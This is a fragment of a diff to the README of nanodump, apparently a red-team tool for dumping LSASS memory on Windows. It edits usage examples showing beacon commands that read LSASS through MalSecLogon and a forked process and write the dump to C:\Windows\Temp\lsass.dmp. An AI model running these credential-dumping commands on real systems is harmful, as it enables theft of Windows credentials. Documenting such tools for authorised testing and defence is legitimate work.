fortra/nanodump/README.md

 beacon> nanodump --seclogon --dup --fork --binary C:\Windows\notepad.exe --valid
 ```

-Get a handle with MalSecLogon, read LSASS indirectly by using a fork and download the dump with a valid signature:
+Get a handle with MalSecLogon, read LSASS indirectly by using a fork and write the dump to disk with a valid signature (a nanodump binary will be uploaded!):
 ```
-beacon> nanodump --seclogon --fork --valid
+beacon> nanodump --seclogon --fork --valid --write C:\Windows\Temp\lsass.dmp
 ```

 Download the dump with an invalid signature (default):